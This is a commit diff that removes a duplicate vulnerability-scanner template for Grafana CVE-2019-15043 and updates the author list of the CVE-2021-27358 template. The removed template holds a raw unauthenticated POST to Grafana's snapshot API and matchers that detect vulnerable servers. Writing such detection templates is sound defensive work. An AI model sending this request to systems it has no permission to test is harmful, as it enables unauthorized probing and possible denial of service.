Removed duplicate CVE template
parent
c3ca28246b
commit
e4760f13bf
|
@ -1,40 +0,0 @@
|
|||
id: CVE-2019-15043
|
||||
|
||||
info:
|
||||
name: Grafana Unauthenticated Snapshot Creation
|
||||
author: bing0o
|
||||
severity: high
|
||||
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
||||
reference:
|
||||
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
||||
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
||||
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-15043
|
||||
cwe-id: CWE-306
|
||||
tags: cve,cve2019,grafana,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/snapshots HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- part: body
|
||||
type: word
|
||||
words:
|
||||
- '"deleteUrl":'
|
||||
- '"deleteKey":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
|
@ -2,7 +2,7 @@ id: CVE-2021-27358
|
|||
|
||||
info:
|
||||
name: Grafana Unauthenticated Snapshot Creation
|
||||
author: pdteam
|
||||
author: pdteam,bing0o
|
||||
severity: high
|
||||
description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
|
||||
reference:
|
||||
|
|
Loading…
Reference in New Issue